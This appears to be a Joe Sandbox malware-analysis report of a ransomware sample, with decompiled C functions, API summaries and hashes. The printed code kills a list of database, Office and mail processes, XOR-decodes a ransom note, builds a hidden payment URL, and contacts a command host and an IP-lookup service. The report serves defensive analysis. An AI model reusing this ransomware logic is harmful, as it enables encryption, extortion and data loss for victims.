                                      					_v216 = 0x630064;
                                      					_v212 = 0x670062;
                                      					_v208 = 0x760068;
                                      					_v204 = 0x79006a;
                                      					_v200 = 0x790071;
                                      					_v196 = 0x6a0037;
                                      					_v192 = 0x6c0063;
                                      					_v188 = 0x2e006b;
                                      					_v184 = 0x6e006f;
                                      					_v180 = 0x6f0069;
                                      					_v176 = 0x2e006e;
                                      					_v172 = 0x6f0074;
                                      					_v168 = 0x2f0070;
                                      					_v164 = 0;
                                      					_t113 =  *0x412ae4; // 0x8d0000
                                      					if(_t113 == 0) {
                                      						_t56 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                      						 *0x412ae4 = _t56;
                                      						if(_t56 != 0) {
                                      							wsprintfW(_t56, L"%s%s",  &_v232, _t90);
                                      						}
                                      					}
                                      					VirtualFree(_v156, 0, 0x8000);
                                      					_t44 = E00407720( &_v152);
                                      					goto L25;
                                      				}
                                      				while(1) {
                                      					L11:
                                      					lstrcpyW(_t84, _t90);
                                      					_t84[lstrlenW(_t84)] = 0x20;
                                      					_t84 = 0x412000;
                                      					_t60 =  *0x412000; // 0xfeff
                                      					if(_t60 == 0) {
                                      						goto L21;
                                      					}
                                      					_t73 = _t60 & 0x0000ffff;
                                      					_t92 = 0x412000 - L"{USERID}";
                                      					do {
                                      						_t61 = L"{USERID}";
                                      						if(_t73 == 0) {
                                      							goto L19;
                                      						}
                                      						while(1) {
                                      							_t74 =  *_t61 & 0x0000ffff;
                                      							if(_t74 == 0) {
                                      								break;
                                      							}
                                      							_t80 = ( *(_t92 + _t61) & 0x0000ffff) - _t74;
                                      							if(_t80 != 0) {
                                      								L18:
                                      								if( *_t61 == 0) {
                                      									break;
                                      								}
                                      								goto L19;
                                      							}
                                      							_t61 =  &(_t61[1]);
                                      							if( *(_t92 + _t61) != _t80) {
                                      								continue;
                                      							}
                                      							goto L18;
                                      						}
                                      						_t90 = _v236;
                                      						goto L11;
                                      						L19:
                                      						_t20 =  &(_t84[1]); // 0x2d002d
                                      						_t73 =  *_t20 & 0x0000ffff;
                                      						_t84 =  &(_t84[1]);
                                      						_t92 = _t92 + 2;
                                      					} while (_t73 != 0);
                                      					_t90 = _v236;
                                      					goto L21;
                                      				}
                                      				goto L21;
                                      			}














































                                      0x004040b5
                                      0x0040431c
                                      0x00404321
                                      0x00404321
                                      0x004040bb
                                      0x004040bc
                                      0x004040be
                                      0x004040bf
                                      0x004040c4
                                      0x004040c6
                                      0x004040c7
                                      0x004040c9
                                      0x004040ca
                                      0x004040cc
                                      0x004040cd
                                      0x004040cf
                                      0x004040d0
                                      0x004040d5
                                      0x004040d7
                                      0x004040d8
                                      0x004040e1
                                      0x004040ea
                                      0x004040f8
                                      0x00404101
                                      0x0040410b
                                      0x00404111
                                      0x00404117
                                      0x00404128
                                      0x00404124
                                      0x00404124
                                      0x00404124
                                      0x0040412f
                                      0x0040413b
                                      0x00404147
                                      0x0040414d
                                      0x00404155
                                      0x0040415a
                                      0x0040415f
                                      0x00404162
                                      0x00404167
                                      0x00404170
                                      0x00404170
                                      0x00404170
                                      0x00404173
                                      0x00404178
                                      0x0040417c
                                      0x00404181
                                      0x00404181
                                      0x00404190
                                      0x00404190
                                      0x00404197
                                      0x00404198
                                      0x004041a4
                                      0x004041b8
                                      0x004041bc
                                      0x0040423a
                                      0x0040423c
                                      0x00404244
                                      0x0040424c
                                      0x00404254
                                      0x0040425c
                                      0x00404264
                                      0x0040426c
                                      0x00404274
                                      0x0040427c
                                      0x00404284
                                      0x0040428c
                                      0x00404294
                                      0x0040429c
                                      0x004042a4
                                      0x004042ac
                                      0x004042b4
                                      0x004042bc
                                      0x004042c4
                                      0x004042c9
                                      0x004042cf
                                      0x004042de
                                      0x004042e4
                                      0x004042eb
                                      0x004042f9
                                      0x004042ff
                                      0x004042eb
                                      0x0040430d
                                      0x00404317
                                      0x00000000
                                      0x00404317
                                      0x004041c0
                                      0x004041c0
                                      0x004041c2
                                      0x004041d4
                                      0x004041d8
                                      0x004041dd
                                      0x004041e6
                                      0x00000000
                                      0x00000000
                                      0x004041ea
                                      0x004041ed
                                      0x004041f3
                                      0x004041f3
                                      0x004041fb
                                      0x00000000
                                      0x00000000
                                      0x00404200
                                      0x00404200
                                      0x00404206
                                      0x00000000
                                      0x00000000
                                      0x00404210
                                      0x00404212
                                      0x0040421d
                                      0x00404221
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404221
                                      0x00404214
                                      0x0040421b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040421b
                                      0x00404322
                                      0x00000000
                                      0x00404227
                                      0x00404227
                                      0x00404227
                                      0x0040422b
                                      0x0040422e
                                      0x00404231
                                      0x00404236
                                      0x00000000
                                      0x00404236
                                      0x00000000

                                      APIs
                                        • Part of subcall function 004039B0: GetProcessHeap.KERNEL32(?,?,00404587,00000000,?,00000000), ref: 00403A4C
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00406DB7
                                        • Part of subcall function 00406D90: GetUserNameW.ADVAPI32(00000000,?), ref: 00406DC8
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00406DE6
                                        • Part of subcall function 00406D90: GetComputerNameW.KERNEL32 ref: 00406DF0
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 00406E10
                                        • Part of subcall function 00406D90: wsprintfW.USER32 ref: 00406E51
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E6E
                                        • Part of subcall function 00406D90: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00406E92
                                        • Part of subcall function 00406D90: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,?,?), ref: 00406EB6
                                        • Part of subcall function 00406D90: RegCloseKey.ADVAPI32(00000000), ref: 00406ED2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BF2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BFD
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C13
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C1E
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(004048B6,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C34
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C3F
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C55
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C60
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C76
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C81
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C97
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CA2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CC1
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CCC
                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040410B
                                      • lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00404147
                                      • lstrcpyW.KERNEL32 ref: 004041C2
                                      • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004041C9
                                      • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 004042DE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
                                      • String ID: %s%s$/$7$:$b$c$d$h$h$i$j$k$n$o$p$q$ransom_id=$t$t${USERID}
                                      • API String ID: 4100118565-914392996
                                      • Opcode ID: 9ef8ab6f65e3180621a96e978af0e414a349b7cd4cbb51f09f0a87e37010286e
                                      • Instruction ID: 44f1d7409a56cb0d5c487c66e452f22c269fbcb55178584459732c151bd8d75b
                                      • Opcode Fuzzy Hash: 9ef8ab6f65e3180621a96e978af0e414a349b7cd4cbb51f09f0a87e37010286e
                                      • Instruction Fuzzy Hash: E451F5B06143009AE7209F11DD0976B7BA5EBC0748F404A3EFA817B2D1E7B8AD55C79E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 98%
                                      			E00404640() {
                                      				char* _v12;
                                      				char* _v16;
                                      				char* _v20;
                                      				char* _v24;
                                      				char* _v28;
                                      				char* _v32;
                                      				char* _v36;
                                      				char* _v40;
                                      				char* _v44;
                                      				char* _v48;
                                      				char* _v52;
                                      				char* _v56;
                                      				char* _v60;
                                      				char* _v64;
                                      				char* _v68;
                                      				char* _v72;
                                      				char* _v76;
                                      				char* _v80;
                                      				char* _v84;
                                      				char* _v88;
                                      				char* _v92;
                                      				char* _v96;
                                      				char* _v100;
                                      				char* _v104;
                                      				char* _v108;
                                      				char* _v112;
                                      				char* _v116;
                                      				char* _v120;
                                      				char* _v124;
                                      				char* _v128;
                                      				char* _v132;
                                      				char* _v136;
                                      				char* _v140;
                                      				char* _v144;
                                      				char* _v148;
                                      				char* _v152;
                                      				char* _v156;
                                      				char* _v160;
                                      				char* _v164;
                                      				void* _v172;
                                      				int _t51;
                                      				int _t52;
                                      				void* _t60;
                                      				WCHAR* _t62;
                                      				void* _t65;
                                      				void* _t70;
                                      				signed int _t71;
                                      				void* _t72;
                                      				signed int _t74;
                                      				void* _t76;
                                      
                                      				_t76 = (_t74 & 0xfffffff8) - 0xa4;
                                      				_v164 = L"msftesql.exe";
                                      				_v160 = L"sqlagent.exe";
                                      				_v156 = L"sqlbrowser.exe";
                                      				_v152 = L"sqlservr.exe";
                                      				_v148 = L"sqlwriter.exe";
                                      				_v144 = L"oracle.exe";
                                      				_v140 = L"ocssd.exe";
                                      				_v136 = L"dbsnmp.exe";
                                      				_v132 = L"synctime.exe";
                                      				_v128 = L"mydesktopqos.exe";
                                      				_v124 = L"agntsvc.exeisqlplussvc.exe";
                                      				_v120 = L"xfssvccon.exe";
                                      				_v116 = L"mydesktopservice.exe";
                                      				_v112 = L"ocautoupds.exe";
                                      				_v108 = L"agntsvc.exeagntsvc.exe";
                                      				_v104 = L"agntsvc.exeencsvc.exe";
                                      				_v100 = L"firefoxconfig.exe";
                                      				_v96 = L"tbirdconfig.exe";
                                      				_v92 = L"ocomm.exe";
                                      				_v88 = L"mysqld.exe";
                                      				_v84 = L"mysqld-nt.exe";
                                      				_v80 = L"mysqld-opt.exe";
                                      				_v76 = L"dbeng50.exe";
                                      				_v72 = L"sqbcoreservice.exe";
                                      				_v68 = L"excel.exe";
                                      				_v64 = L"infopath.exe";
                                      				_v60 = L"msaccess.exe";
                                      				_v56 = L"mspub.exe";
                                      				_v52 = L"onenote.exe";
                                      				_v48 = L"outlook.exe";
                                      				_v44 = L"powerpnt.exe";
                                      				_v40 = L"steam.exe";
                                      				_v36 = L"sqlservr.exe";
                                      				_v32 = L"thebat.exe";
                                      				_v28 = L"thebat64.exe";
                                      				_v24 = L"thunderbird.exe";
                                      				_v20 = L"visio.exe";
                                      				_v16 = L"winword.exe";
                                      				_v12 = L"wordpad.exe";
                                      				_t70 = CreateToolhelp32Snapshot(2, 0);
                                      				_v172 = _t70;
                                      				_t60 = VirtualAlloc(0, 0x22c, 0x3000, 4);
                                      				if(_t60 != 0) {
                                      					 *_t60 = 0x22c;
                                      					if(_t70 != 0xffffffff) {
                                      						_push(_t60);
                                      						Process32FirstW(_t70);
                                      					}
                                      				}
                                      				_t41 = _t60 + 0x24; // 0x24
                                      				_t62 = _t41;
                                      				do {
                                      					_t71 = 0;
                                      					do {
                                      						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
                                      						if(_t51 == 0) {
                                      							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
                                      							if(_t65 != 0) {
                                      								TerminateProcess(_t65, 0);
                                      								CloseHandle(_t65);
                                      							}
                                      						}
                                      						_t71 = _t71 + 1;
                                      						_t46 = _t60 + 0x24; // 0x24
                                      						_t62 = _t46;
                                      					} while (_t71 < 0x27);
                                      					_t72 = _v172;
                                      					_t52 = Process32NextW(_t72, _t60);
                                      					_t48 = _t60 + 0x24; // 0x24
                                      					_t62 = _t48;
                                      				} while (_t52 != 0);
                                      				if(_t60 != 0) {
                                      					VirtualFree(_t60, 0, 0x8000);
                                      				}
                                      				return CloseHandle(_t72);
                                      			}





















































                                      0x00404646
                                      0x00404653
                                      0x0040465b
                                      0x00404663
                                      0x0040466b
                                      0x00404673
                                      0x0040467b
                                      0x00404683
                                      0x0040468b
                                      0x00404693
                                      0x0040469b
                                      0x004046a3
                                      0x004046ab
                                      0x004046b3
                                      0x004046bb
                                      0x004046c3
                                      0x004046cb
                                      0x004046d3
                                      0x004046db
                                      0x004046e3
                                      0x004046eb
                                      0x004046f3
                                      0x004046fb
                                      0x00404703
                                      0x0040470b
                                      0x00404713
                                      0x0040471b
                                      0x00404723
                                      0x0040472e
                                      0x00404739
                                      0x00404744
                                      0x0040474f
                                      0x0040475a
                                      0x00404765
                                      0x00404770
                                      0x0040477b
                                      0x00404786
                                      0x00404791
                                      0x0040479c
                                      0x004047a7
                                      0x004047c4
                                      0x004047c8
                                      0x004047d2
                                      0x004047d6
                                      0x004047d8
                                      0x004047e1
                                      0x004047e3
                                      0x004047e5
                                      0x004047e5
                                      0x004047e1
                                      0x004047f1
                                      0x004047f1
                                      0x004047f4
                                      0x004047f4
                                      0x00404800
                                      0x00404805
                                      0x0040480d
                                      0x0040481b
                                      0x0040481f
                                      0x00404824
                                      0x00404831
                                      0x00404831
                                      0x0040481f
                                      0x0040483b
                                      0x0040483c
                                      0x0040483c
                                      0x0040483f
                                      0x00404844
                                      0x0040484a
                                      0x00404850
                                      0x00404850
                                      0x00404853
                                      0x00404859
                                      0x00404863
                                      0x00404863
                                      0x00404872

                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 004047B2
                                      • VirtualAlloc.KERNEL32(00000000,0000022C,00003000,00000004), ref: 004047CC
                                      • Process32FirstW.KERNEL32(00000000,00000000), ref: 004047E5
                                      • lstrcmpiW.KERNEL32(00000002,00000024), ref: 00404805
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00404815
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00404824
                                      • CloseHandle.KERNEL32(00000000), ref: 00404831
                                      • Process32NextW.KERNEL32(?,00000000), ref: 0040484A
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404863
                                      • CloseHandle.KERNEL32(?), ref: 0040486A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32Virtual$AllocCreateFirstFreeNextOpenSnapshotTerminateToolhelp32lstrcmpi
                                      • String ID: @$(@$0@$8@$<@$@@$L@$P@$X@$\@$\@$`@$l@$l@$x@$x@$@
                                      • API String ID: 3586910739-3725814736
                                      • Opcode ID: 9888b97dcf90e8f6efa24b4065dea21d40555a31716fc4df83624dfcfe3835c8
                                      • Instruction ID: 5199461c7d7482eac4530f3025dd1142b0b19823d44abf373f40a8b8b0f494f1
                                      • Opcode Fuzzy Hash: 9888b97dcf90e8f6efa24b4065dea21d40555a31716fc4df83624dfcfe3835c8
                                      • Instruction Fuzzy Hash: 41515CB51083409FE7209F12994874BBBE4ABC5708F508D3EE6943B2D1D7B88819CF9E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00407A00(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
                                      				long _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				short _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				intOrPtr _v56;
                                      				intOrPtr _v60;
                                      				short _v64;
                                      				void* _t38;
                                      				void* _t40;
                                      				long _t55;
                                      				long _t60;
                                      				WCHAR* _t63;
                                      				void* _t64;
                                      				void* _t65;
                                      				void* _t66;
                                      				void* _t68;
                                      
                                      				_t65 = __ecx;
                                      				_t38 =  *(__ecx + 4);
                                      				if(_t38 != 0) {
                                      					InternetCloseHandle(_t38);
                                      				}
                                      				E004077F0(_t65);
                                      				_t40 = InternetConnectW( *(_t65 + 4), _a4, 0x50, 0, 0, 3, 0, 0);
                                      				_t66 = _t40;
                                      				_v8 = 0;
                                      				_v12 = _t66;
                                      				if(_t66 != 0) {
                                      					_t63 = VirtualAlloc(0, 0x2800, 0x3000, 0x40);
                                      					_v16 = _t63;
                                      					wsprintfW(_t63, L"%s", _a8);
                                      					_t64 = HttpOpenRequestW(_t66, _a36, _t63, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
                                      					if(_t64 != 0) {
                                      						_v64 = 0x6f0048;
                                      						_v20 = 0;
                                      						_v60 = 0x740073;
                                      						_v56 = 0x20003a;
                                      						_v52 = 0x6f006e;
                                      						_v48 = 0x6f006d;
                                      						_v44 = 0x650072;
                                      						_v40 = 0x610072;
                                      						_v36 = 0x73006e;
                                      						_v32 = 0x6d006f;
                                      						_v28 = 0x62002e;
                                      						_v24 = 0x740069;
                                      						if(HttpAddRequestHeadersW(_t64,  &_v64, 0xffffffff, 0) != 0) {
                                      							if(HttpSendRequestW(_t64, _a40, _a44, _a12, _a16) == 0) {
                                      								GetLastError();
                                      							} else {
                                      								_t68 = _a20;
                                      								_t60 = _a24 - 1;
                                      								_a4 = 0;
                                      								if(InternetReadFile(_t64, _t68, _t60,  &_a4) != 0) {
                                      									while(1) {
                                      										_t55 = _a4;
                                      										if(_t55 == 0) {
                                      											goto L13;
                                      										}
                                      										 *((char*)(_t55 + _t68)) = 0;
                                      										_a4 = 0;
                                      										_v8 = 1;
                                      										if(InternetReadFile(_t64, _t68, _t60,  &_a4) != 0) {
                                      											continue;
                                      										} else {
                                      										}
                                      										goto L13;
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      					L13:
                                      					InternetCloseHandle(_t64);
                                      					InternetCloseHandle(_v12);
                                      					VirtualFree(_v16, 0, 0x8000);
                                      					return _v8;
                                      				} else {
                                      					return _t40;
                                      				}
                                      			}



























                                      0x00407a08
                                      0x00407a0b
                                      0x00407a10
                                      0x00407a13
                                      0x00407a13
                                      0x00407a1b
                                      0x00407a32
                                      0x00407a38
                                      0x00407a3a
                                      0x00407a41
                                      0x00407a46
                                      0x00407a68
                                      0x00407a70
                                      0x00407a73
                                      0x00407a97
                                      0x00407a9b
                                      0x00407aa3
                                      0x00407aab
                                      0x00407ab6
                                      0x00407abd
                                      0x00407ac4
                                      0x00407acb
                                      0x00407ad2
                                      0x00407ad9
                                      0x00407ae0
                                      0x00407ae7
                                      0x00407aee
                                      0x00407af5
                                      0x00407b04
                                      0x00407b1b
                                      0x00407b6c
                                      0x00407b1d
                                      0x00407b23
                                      0x00407b26
                                      0x00407b2b
                                      0x00407b3a
                                      0x00407b40
                                      0x00407b40
                                      0x00407b45
                                      0x00000000
                                      0x00000000
                                      0x00407b47
                                      0x00407b52
                                      0x00407b59
                                      0x00407b68
                                      0x00000000
                                      0x00000000
                                      0x00407b6a
                                      0x00000000
                                      0x00407b68
                                      0x00407b40
                                      0x00407b3a
                                      0x00407b1b
                                      0x00407b04
                                      0x00407b72
                                      0x00407b79
                                      0x00407b7e
                                      0x00407b8a
                                      0x00407b99
                                      0x00407a4e
                                      0x00407a4e
                                      0x00407a4e

                                      APIs
                                      • InternetCloseHandle.WININET(?), ref: 00407A13
                                      • InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 00407A32
                                      • VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,00406946,ipv4bot.whatismyipaddress.com,004103B0,00000000), ref: 00407A5F
                                      • wsprintfW.USER32 ref: 00407A73
                                      • HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 00407A91
                                      • HttpAddRequestHeadersW.WININET(00000000,006F0048,000000FF,00000000), ref: 00407AFC
                                      • HttpSendRequestW.WININET(00000000,006F006D,006F006E,00000000,00740069), ref: 00407B13
                                      • InternetReadFile.WININET(00000000,0062002E,006D006E,00000000), ref: 00407B32
                                      • InternetReadFile.WININET(00000000,0062002E,006D006E,00000000), ref: 00407B60
                                      • GetLastError.KERNEL32 ref: 00407B6C
                                      • InternetCloseHandle.WININET(00000000), ref: 00407B79
                                      • InternetCloseHandle.WININET(00000000), ref: 00407B7E
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00406946,ipv4bot.whatismyipaddress.com), ref: 00407B8A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
                                      • String ID: .$:$Fi@$H$HTTP/1.1$i$m$n$n$o$r$r$s
                                      • API String ID: 3906118045-996335725
                                      • Opcode ID: c8dddac5ca2f289de5ab4859de8dc5ee87e9a581b745c866a59695c1e2178a40
                                      • Instruction ID: 138ab0025d8835c4ee6cf1b85085083e902cc9d23406ca5e2eb97d724ccf74a6
                                      • Opcode Fuzzy Hash: c8dddac5ca2f289de5ab4859de8dc5ee87e9a581b745c866a59695c1e2178a40
                                      • Instruction Fuzzy Hash: AD418371A00209BBEB109F51DD49FDE7FB9FF04754F10402AFA04BA2A1C7B5A950CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00404186(void* __eax, void* __ebp, WCHAR* _a12, char _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, short _a84, void* _a92, char _a96) {
                                      				void* _t31;
                                      				void* _t35;
                                      				WCHAR* _t36;
                                      				signed short _t40;
                                      				signed short* _t41;
                                      				signed int _t46;
                                      				signed int _t47;
                                      				void* _t50;
                                      				WCHAR* _t51;
                                      				WCHAR* _t53;
                                      				void* _t56;
                                      				WCHAR* _t72;
                                      
                                      				_t31 = __eax;
                                      				do {
                                      					 *(_t31 + 0x412000) =  *(_t31 + 0x412000) ^ 0x00000005;
                                      					_t31 = _t31 + 1;
                                      				} while (_t31 < 0xad6);
                                      				 *0x412b04 = 0x412000;
                                      				_t51 = E00407BA0(0x412000, L"{USERID}");
                                      				if(_t51 != 0) {
                                      					while(1) {
                                      						L4:
                                      						lstrcpyW(_t51, _t53);
                                      						_t51[lstrlenW(_t51)] = 0x20;
                                      						_t51 = 0x412000;
                                      						_t40 =  *0x412000; // 0xfeff
                                      						if(_t40 == 0) {
                                      							goto L14;
                                      						}
                                      						_t46 = _t40 & 0x0000ffff;
                                      						_t56 = 0x412000 - L"{USERID}";
                                      						do {
                                      							_t41 = L"{USERID}";
                                      							if(_t46 == 0) {
                                      								goto L12;
                                      							} else {
                                      								while(1) {
                                      									_t47 =  *_t41 & 0x0000ffff;
                                      									if(_t47 == 0) {
                                      										break;
                                      									}
                                      									_t50 = ( *(_t56 + _t41) & 0x0000ffff) - _t47;
                                      									if(_t50 != 0) {
                                      										L11:
                                      										if( *_t41 == 0) {
                                      											break;
                                      										} else {
                                      											goto L12;
                                      										}
                                      									} else {
                                      										_t41 =  &(_t41[1]);
                                      										if( *(_t56 + _t41) != _t50) {
                                      											continue;
                                      										} else {
                                      											goto L11;
                                      										}
                                      									}
                                      									goto L14;
                                      								}
                                      								_t53 = _a12;
                                      								goto L4;
                                      							}
                                      							goto L14;
                                      							L12:
                                      							_t7 =  &(_t51[1]); // 0x2d002d
                                      							_t46 =  *_t7 & 0x0000ffff;
                                      							_t51 =  &(_t51[1]);
                                      							_t56 = _t56 + 2;
                                      						} while (_t46 != 0);
                                      						_t53 = _a12;
                                      						goto L14;
                                      					}
                                      				}
                                      				L14:
                                      				_a16 = 0x740068;
                                      				_a20 = 0x700074;
                                      				_a24 = 0x2f003a;
                                      				_a28 = 0x67002f;
                                      				_a32 = 0x630064;
                                      				_a36 = 0x670062;
                                      				_a40 = 0x760068;
                                      				_a44 = 0x79006a;
                                      				_a48 = 0x790071;
                                      				_a52 = 0x6a0037;
                                      				_a56 = 0x6c0063;
                                      				_a60 = 0x2e006b;
                                      				_a64 = 0x6e006f;
                                      				_a68 = 0x6f0069;
                                      				_a72 = 0x2e006e;
                                      				_a76 = 0x6f0074;
                                      				_a80 = 0x2f0070;
                                      				_a84 = 0;
                                      				_t72 =  *0x412ae4; // 0x8d0000
                                      				if(_t72 == 0) {
                                      					_t36 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                      					 *0x412ae4 = _t36;
                                      					if(_t36 != 0) {
                                      						wsprintfW(_t36, L"%s%s",  &_a16, _t53);
                                      					}
                                      				}
                                      				VirtualFree(_a92, 0, 0x8000);
                                      				_t35 = E00407720( &_a96);
                                      				return _t35;
                                      			}















                                      0x00404186
                                      0x00404190
                                      0x00404190
                                      0x00404197
                                      0x00404198
                                      0x004041a4
                                      0x004041b8
                                      0x004041bc
                                      0x004041c0
                                      0x004041c0
                                      0x004041c2
                                      0x004041d4
                                      0x004041d8
                                      0x004041dd
                                      0x004041e6
                                      0x00000000
                                      0x00000000
                                      0x004041ea
                                      0x004041ed
                                      0x004041f3
                                      0x004041f3
                                      0x004041fb
                                      0x00000000
                                      0x00404200
                                      0x00404200
                                      0x00404200
                                      0x00404206
                                      0x00000000
                                      0x00000000
                                      0x00404210
                                      0x00404212
                                      0x0040421d
                                      0x00404221
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404214
                                      0x00404214
                                      0x0040421b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040421b
                                      0x00000000
                                      0x00404212
                                      0x00404322
                                      0x00000000
                                      0x00404322
                                      0x00000000
                                      0x00404227
